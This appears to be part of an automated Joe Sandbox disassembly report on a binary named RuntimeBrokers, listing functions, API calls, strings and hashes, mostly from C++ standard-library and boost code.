                                        • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140(?,?,00000001,00000001,000000B0,6C0F6741,?,?,00000000,6C0F6643,?,?,?,00000064,6C0F6603), ref: 6C0F794E
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: U?$char_traits@$D@std@@@std@@$V01@$??5?$basic_istream@$?fail@ios_base@std@@H_prolog3$??0?$basic_ios@??0?$basic_istream@??1?$basic_ios@?bad@ios_base@std@@?clear@?$basic_ios@?eof@ios_base@std@@?get@?$basic_istream@?imbue@?$basic_ios@?setf@ios_base@std@@D@std@@@1@_V01@@V32@@V?$basic_streambuf@Vlocale@2@
                                        • String ID:
                                        • API String ID: 4005712577-0
                                        • Opcode ID: 8f11598829f5a8e9eed6230d927984b36aec8fe5c8492411e7aaf192f5d2fdb8
                                        • Instruction ID: 49ccd7df092db771b4795b27a1215a1cf19c7c9d2ef0c15682ae5dc0a130f301
                                        • Opcode Fuzzy Hash: 8f11598829f5a8e9eed6230d927984b36aec8fe5c8492411e7aaf192f5d2fdb8
                                        • Instruction Fuzzy Hash: 0D215331904259DBDF14CF64C884FDCB7F9AF11318F148189E859A7281DB70AE49CB52
                                        Function 6C0BE2D3 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C0BE2DD
                                          • Part of subcall function 6C0B9990: __EH_prolog3.LIBCMT ref: 6C0B9997
                                          • Part of subcall function 6C0B9990: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(00000008,6C0F78AA,?,00000001,00000001,000000B0,6C0F6741,?,?,00000000,6C0F6643,?,?,?,00000064,6C0F6603), ref: 6C0B99B4
                                          • Part of subcall function 6C0B9990: ??0?$basic_istream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140(?,00000000,00000000,00000008,6C0F78AA,?,00000001,00000001,000000B0,6C0F6741,?,?,00000000,6C0F6643,?), ref: 6C0B99CC
                                        • ?imbue@?$basic_ios@DU?$char_traits@D@std@@@std@@QAE?AVlocale@2@ABV32@@Z.MSVCP140(?,?,?,00000001,00000001,000000B0,6C0B789E,?,?,00000000,6C0B76DF,?,?,?,00000060,6C0B769F), ref: 6C0BE310
                                          • Part of subcall function 6C0BDB86: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV01@AAI@Z.MSVCP140(?,?,?,6C0BE32E,?,?,?,?,00000001,00000001,000000B0,6C0B789E,?,?,00000000,6C0B76DF), ref: 6C0BDB92
                                          • Part of subcall function 6C0BDB86: ?eof@ios_base@std@@QBE_NXZ.MSVCP140(?,?,6C0BE32E,?,?,?,?,00000001,00000001,000000B0,6C0B789E,?,?,00000000,6C0B76DF,?), ref: 6C0BDB9F
                                          • Part of subcall function 6C0BDB86: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP140(Function_0001974B,?,?,6C0BE32E,?,?,?,?,00000001,00000001,000000B0,6C0B789E,?,?,00000000,6C0B76DF), ref: 6C0BDBB0
                                        • ?fail@ios_base@std@@QBE_NXZ.MSVCP140(?,?,00000001,00000001,000000B0,6C0B789E,?,?,00000000,6C0B76DF,?,?,?,00000060,6C0B769F), ref: 6C0BE341
                                        • ?bad@ios_base@std@@QBE_NXZ.MSVCP140(?,?,00000001,00000001,000000B0,6C0B789E,?,?,00000000,6C0B76DF,?,?,?,00000060,6C0B769F), ref: 6C0BE35C
                                        • ?get@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,?,00000001,00000001,000000B0,6C0B789E,?,?,00000000,6C0B76DF,?,?,?,00000060,6C0B769F), ref: 6C0BE36C
                                        • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140(?,?,00000001,00000001,000000B0,6C0B789E,?,?,00000000,6C0B76DF,?,?,?,00000060,6C0B769F), ref: 6C0BE39A
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: U?$char_traits@$D@std@@@std@@$V01@$??5?$basic_istream@H_prolog3$??0?$basic_ios@??0?$basic_istream@??1?$basic_ios@?bad@ios_base@std@@?eof@ios_base@std@@?fail@ios_base@std@@?get@?$basic_istream@?imbue@?$basic_ios@D@std@@@1@_V01@@V32@@V?$basic_streambuf@Vlocale@2@
                                        • String ID:
                                        • API String ID: 3692561807-0
                                        • Opcode ID: 7eb112d27bdb17e336780d22b25c5f4f5b36cc6af5f70e8f5b154f643d8b7deb
                                        • Instruction ID: 5a2e1d28c91fa982b72e706df558d4bb1b51a8ded26f41c0d9ac671bd24967d1
                                        • Opcode Fuzzy Hash: 7eb112d27bdb17e336780d22b25c5f4f5b36cc6af5f70e8f5b154f643d8b7deb
                                        • Instruction Fuzzy Hash: 47213830A04219DBDF14CF64C888FDCB7B9AF11318F148189E41AAB381EB71AA49CF61
                                        Function 0049C10F Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 0049C116
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0049C120
                                          • Part of subcall function 00433E9D: std::_Lockit::_Lockit.LIBCPMT ref: 00433ED1
                                          • Part of subcall function 00433E9D: std::_Lockit::~_Lockit.LIBCPMT ref: 00433EFF
                                        • moneypunct.LIBCPMT ref: 0049C15A
                                        • std::_Facet_Register.LIBCPMT ref: 0049C171
                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0049C191
                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0049C1AF
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2954513519.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2954495294.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954625279.000000000052E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954661807.0000000000577000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954678573.0000000000578000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954698601.000000000058A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
                                        • String ID:
                                        • API String ID: 113178234-0
                                        • Opcode ID: 5d7d4111beb5d92aa671b6b45246ec136a05b78381b22041c984bfcf00b63d44
                                        • Instruction ID: 6eda3efbacead4a70786b493ed2ef0223528b2cd72517e357d29d83ca64e5c1f
                                        • Opcode Fuzzy Hash: 5d7d4111beb5d92aa671b6b45246ec136a05b78381b22041c984bfcf00b63d44
                                        • Instruction Fuzzy Hash: 87110275900119ABCF11EBA5D842ABE7B75BF58318F24042EF410BB292DF389E05DB99
                                        Function 0049C1B5 Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 0049C1BC
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0049C1C6
                                          • Part of subcall function 00433E9D: std::_Lockit::_Lockit.LIBCPMT ref: 00433ED1
                                          • Part of subcall function 00433E9D: std::_Lockit::~_Lockit.LIBCPMT ref: 00433EFF
                                        • moneypunct.LIBCPMT ref: 0049C200
                                        • std::_Facet_Register.LIBCPMT ref: 0049C217
                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0049C237
                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0049C255
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2954513519.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2954495294.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954625279.000000000052E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954661807.0000000000577000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954678573.0000000000578000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954698601.000000000058A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
                                        • String ID:
                                        • API String ID: 113178234-0
                                        • Opcode ID: ca7bf957abd137d2e12ce9e42624b993533255417e9f1813f3d4d12e4e233c2b
                                        • Instruction ID: 75cbd7bfb6e13532db958b02cc04da5944fa03364ff30200c5ec6761f14e5da0
                                        • Opcode Fuzzy Hash: ca7bf957abd137d2e12ce9e42624b993533255417e9f1813f3d4d12e4e233c2b
                                        • Instruction Fuzzy Hash: AE11C2719001149BCF11EBA5D846AEE7FB4BF58718F24046EF510B7292DF389A058BA9
                                        Function 0049C44D Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 0049C454
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0049C45E
                                          • Part of subcall function 00433E9D: std::_Lockit::_Lockit.LIBCPMT ref: 00433ED1
                                          • Part of subcall function 00433E9D: std::_Lockit::~_Lockit.LIBCPMT ref: 00433EFF
                                        • numpunct.LIBCPMT ref: 0049C498
                                        • std::_Facet_Register.LIBCPMT ref: 0049C4AF
                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0049C4CF
                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0049C4ED
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2954513519.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2954495294.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954625279.000000000052E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954661807.0000000000577000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954678573.0000000000578000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954698601.000000000058A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrownumpunct
                                        • String ID:
                                        • API String ID: 2509942033-0
                                        • Opcode ID: 9314acada29d24326538a6c6bb10170d455ee5432042be19c3e84b07d62d159b
                                        • Instruction ID: 8d80f3897a4e770502567d1c9097ff3db3b2360dfdb58d644922275b9593e18a
                                        • Opcode Fuzzy Hash: 9314acada29d24326538a6c6bb10170d455ee5432042be19c3e84b07d62d159b
                                        • Instruction Fuzzy Hash: C511C6719401159BCF01FBA5D855AFE7B75BF58318F24051EF410772A2CF389A058759
                                        Function 6C0D3829 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 293stringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 6C0AA8F0: memmove.VCRUNTIME140(?,?,6C0B5839,?,?,00000000,?,?,6C0B5839,?,?), ref: 6C0AA917
                                          • Part of subcall function 6C0D34AF: __EH_prolog3.LIBCMT ref: 6C0D34B6
                                        • _localtime64_s.API-MS-WIN-CRT-TIME-L1-1-0(?,?,?,?,?,6C341198,00000000), ref: 6C0D3ABA
                                        • strftime.API-MS-WIN-CRT-TIME-L1-1-0(?,?,?,?), ref: 6C0D3AE1
                                        • strftime.API-MS-WIN-CRT-TIME-L1-1-0(?,?,?,?), ref: 6C0D3B33
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: strftime$H_prolog3_localtime64_smemmove
                                        • String ID: %Y-%m-%d %H:%M:%S.%f$000000000
                                        • API String ID: 2888848054-1131709979
                                        • Opcode ID: 81add328f9fadf403a8522be3b0b6d4e992fdbb948a297f2dca0766c41b099c0
                                        • Instruction ID: d3ed0c6f3a9323d1e2beb2be087159af791dd7eb0a1a8d37650ac8288436eee5
                                        • Opcode Fuzzy Hash: 81add328f9fadf403a8522be3b0b6d4e992fdbb948a297f2dca0766c41b099c0
                                        • Instruction Fuzzy Hash: 5EB1BB71B04309EFCB14CBA8C894BEDB7F9AF49314F540199E109A7681DB70AA86CF61
                                        Function 6C14A212 Relevance: 9.0, APIs: 6, Instructions: 37threadstringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentThread.KERNEL32 ref: 6C14A223
                                        • SetThreadAffinityMask.KERNEL32(00000000), ref: 6C14A22A
                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,6C0F8462,init plugin end:), ref: 6C14A236
                                        • GetCurrentThread.KERNEL32 ref: 6C14A23D
                                        • SetThreadAffinityMask.KERNEL32(00000000), ref: 6C14A244
                                        • strncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000050,?,000000FF,?,?,?,6C0F8462,init plugin end:), ref: 6C14A261
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: Thread$AffinityCurrentMask$CounterPerformanceQuerystrncpy_s
                                        • String ID:
                                        • API String ID: 1905445695-0
                                        • Opcode ID: 5b1a5694376ebf237115257a871088c781743e9b7f838885f11da13aa66aaf59
                                        • Instruction ID: b312cf21183f750e8a41fd08024cc05fcbcc19c47dd2114c11632da52f31858f
                                        • Opcode Fuzzy Hash: 5b1a5694376ebf237115257a871088c781743e9b7f838885f11da13aa66aaf59
                                        • Instruction Fuzzy Hash: CF016972A10380EBCF20EBA5C849A8A7B7CEB46B59F100248F50ADA2C0D7B4E641DB54
                                        Function 004105B1 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 255COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2954513519.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2954495294.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954625279.000000000052E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954661807.0000000000577000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954678573.0000000000578000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954698601.000000000058A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: _wcsrchr_wcsstr
                                        • String ID: \..$\..\$\.\
                                        • API String ID: 814802282-1722125429
                                        • Opcode ID: 61bfabf536266e2aac747f3a8900dec16e710356f4435adba3522f7e00d9cdf1
                                        • Instruction ID: 942eef8f2556c75f1b728722ea9de1f488036730775d31718c174e1689712996
                                        • Opcode Fuzzy Hash: 61bfabf536266e2aac747f3a8900dec16e710356f4435adba3522f7e00d9cdf1
                                        • Instruction Fuzzy Hash: E6B15DB091021C9EDF64DF14C995BDD77B8AF44314F1080AEE60CAA292DBB89AC4CF5D
                                        Function 6C0AE460 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 200COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 6C0AF060: memmove.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6C0AF138
                                        • memmove.VCRUNTIME140(?,00000000,?,?,?,?,?,00000009,0000000D,0000000A,0000000C,00000008,0000005C,0000002F,00000022,-00000002), ref: 6C0AE598
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,?,00000002,Empty escape sequence in string,0000001F,-00000002,B33B76E5,?,?,00000001,?,?,?,?), ref: 6C0AE690
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: memmove$_invalid_parameter_noinfo_noreturn
                                        • String ID: /<l$Bad escape sequence in string$Empty escape sequence in string
                                        • API String ID: 2580228974-3040918616
                                        • Opcode ID: bcd996ebc8d969775213aceb18e772e56de9dd0e74dbdbd97427c9df36500b1d
                                        • Instruction ID: 5fba64504e155da04d070806cf9c2a7ba1a445cdf78fb8500a175647dd8b3eb4
                                        • Opcode Fuzzy Hash: bcd996ebc8d969775213aceb18e772e56de9dd0e74dbdbd97427c9df36500b1d
                                        • Instruction Fuzzy Hash: D271D471A00218AFDB04CFE8D884BEDBBF9EF49314F504519E420AB792D734A956CBA1
                                        Function 6C0B2950 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 149COMMON
                                        Download Yara Rule
                                        APIs
                                        • memmove.VCRUNTIME140(?,00000000,?,?,00000000,B33B76E5,?,6C10B7C7,?,000000FF,?,6C0B18DB,6C10B7C7,6C3CE62F,00000000,6C3CE62F), ref: 6C0B29E7
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,00000000,?,?,00000000,B33B76E5,?), ref: 6C0B2A30
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,00000000,?,?,00000000,B33B76E5,?), ref: 6C0B2A7F
                                        • memmove.VCRUNTIME140(?,6C3CE7AC,00000001,?,00000000,00000000,?,?,00000000,B33B76E5,?), ref: 6C0B2AC8
                                          • Part of subcall function 6C0AFE80: memmove.VCRUNTIME140(00000000,7FFFFFFF,00000000,?,00000000), ref: 6C0AFF43
                                          • Part of subcall function 6C0AFE80: memmove.VCRUNTIME140(00000010,00000000,?,00000000,7FFFFFFF,00000000,?,00000000), ref: 6C0AFF51
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: memmove$_invalid_parameter_noinfo_noreturn
                                        • String ID: /<l
                                        • API String ID: 2580228974-1390158157
                                        • Opcode ID: 90d353cd4170c3ee6798bbb6ba4a6e1bc9b1b99fa6b680bc477e32cce25fc42d
                                        • Instruction ID: 0cbd88a44d420aa7e3b1782eae8331ff6db5f55e671cedb775b36063deaf2c78
                                        • Opcode Fuzzy Hash: 90d353cd4170c3ee6798bbb6ba4a6e1bc9b1b99fa6b680bc477e32cce25fc42d
                                        • Instruction Fuzzy Hash: CF51D971B10244AFD714CFA8CC88B9EBBF6FF49704F104119E415ABB81D776A985CBA2
                                        Function 6C0E2B29 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 115COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C0E2B30
                                          • Part of subcall function 6C0E5281: __EH_prolog3.LIBCMT ref: 6C0E5288
                                          • Part of subcall function 6C0E41F1: __EH_prolog3.LIBCMT ref: 6C0E41F8
                                        Strings
                                        • d:\ci_dev\wegame_client\dependences\boost_1_67_0\boost\property_tree\detail\info_parser_read.hpp, xrefs: 6C0E2C5C
                                        • character expected after backslash, xrefs: 6C0E2BF9
                                        • unknown escape sequence, xrefs: 6C0E2C37
                                        • class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > __cdecl boost::property_tree::info_parser::expand_escapes<const char*>(const char *,const char *), xrefs: 6C0E2C61
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: H_prolog3$H_prolog3_
                                        • String ID: character expected after backslash$class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > __cdecl boost::property_tree::info_parser::expand_escapes<const char*>(const char *,const char *)$d:\ci_dev\wegame_client\dependences\boost_1_67_0\boost\property_tree\detail\info_parser_read.hpp$unknown escape sequence
                                        • API String ID: 4240126716-3458890962
                                        • Opcode ID: 88c6b7064103ed294e2ab4c05a06143c960633fe78376f00135c865c0af90207
                                        • Instruction ID: ac4e891167617bf3af709a2a6b873e77bc69589bdb6d554e212254fa3f7b6f6b
                                        • Opcode Fuzzy Hash: 88c6b7064103ed294e2ab4c05a06143c960633fe78376f00135c865c0af90207
                                        • Instruction Fuzzy Hash: 70417F709C820FEEDB14AE88C849BCEBBF46B1D708F94414AE14477D81C7742A868F62
                                        Function 6C0BE66A Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C0BE671
                                          • Part of subcall function 6C0B6B70: ?_Execute_once@std@@YAHAAUonce_flag@1@P6GHPAX1PAPAX@Z1@Z.MSVCP140(6C438534,6C0B6BB1,6C438538,?,6C0BA235,00000000,?,00000010), ref: 6C0B6B81
                                          • Part of subcall function 6C0B6B70: terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C0B6B8D
                                        • ??Edirectory_iterator@filesystem@ierd_tgp@@QAEAAV012@XZ.COMMON(00000000,00000000,00000054,6C0BE7C6,00000000,B33B76E5,?,00000000,6C317428,000000FF,?,6C0BBD8D,00000000), ref: 6C0BE6AE
                                        • ?equal@directory_iterator@filesystem@ierd_tgp@@QBE_NABV123@@Z.COMMON(?,00000000,00000000,00000054,6C0BE7C6,00000000,B33B76E5,?,00000000,6C317428,000000FF,?,6C0BBD8D,00000000), ref: 6C0BE6CB
                                        • _CxxThrowException.VCRUNTIME140(?,6C3DBC60,?,00000000,?,filesystem::recursive_directory_iterator directory error,00000000,00000054,6C0BE7C6,00000000,B33B76E5,?,00000000,6C317428,000000FF), ref: 6C0BE772
                                        Strings
                                        • filesystem::recursive_directory_iterator directory error, xrefs: 6C0BE74A
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
